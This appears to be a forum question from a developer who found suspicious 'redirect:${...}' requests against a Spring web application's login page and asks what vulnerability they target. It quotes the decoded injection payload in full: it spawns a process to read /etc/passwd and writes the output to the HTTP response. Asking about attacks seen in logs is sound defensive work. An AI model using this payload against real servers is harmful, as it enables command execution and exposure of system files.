I have a public-facing web application that uses Spring MVC (3.2.x) and Spring Security (3.1.x). This morning I observed requests of the following form in our access logs:
GET /MyWebAppPath/login.do?redirect:${Some URL-encoded EL code here}
What bug or feature of Spring was this attempting to exploit? Under what conditions would Spring (or some other code) evaluate that EL expression?
It looks like the ?redirect:
parameter was ignored for me, but it makes me nervous because I don't know where to look to verify that I'm not vulnerable. All my Googling has turned up unrelated things (as best I can tell).
If that code inside the ${ }
had actually run, it would have attempted to dump the contents of /etc/passwd
to the client. (Thankfully it looks like it never did run. Plus that file doesn't exist on our system. And our Tomcat runs as a user with limited permissions.)
EDIT: Here is the actual code that was inside the ${ }
, after decoding and adding newlines to help readability:
#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'cat','/etc/passwd'})).start(),
#b=#a.getInputStream(),
#c=new java.io.InputStreamReader(#b),
#d=new java.io.BufferedReader(#c),
#e=new char[50000],
#d.read(#e),
#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),
#matt.getWriter().println(#e),
#matt.getWriter().flush(),
#matt.getWriter().close()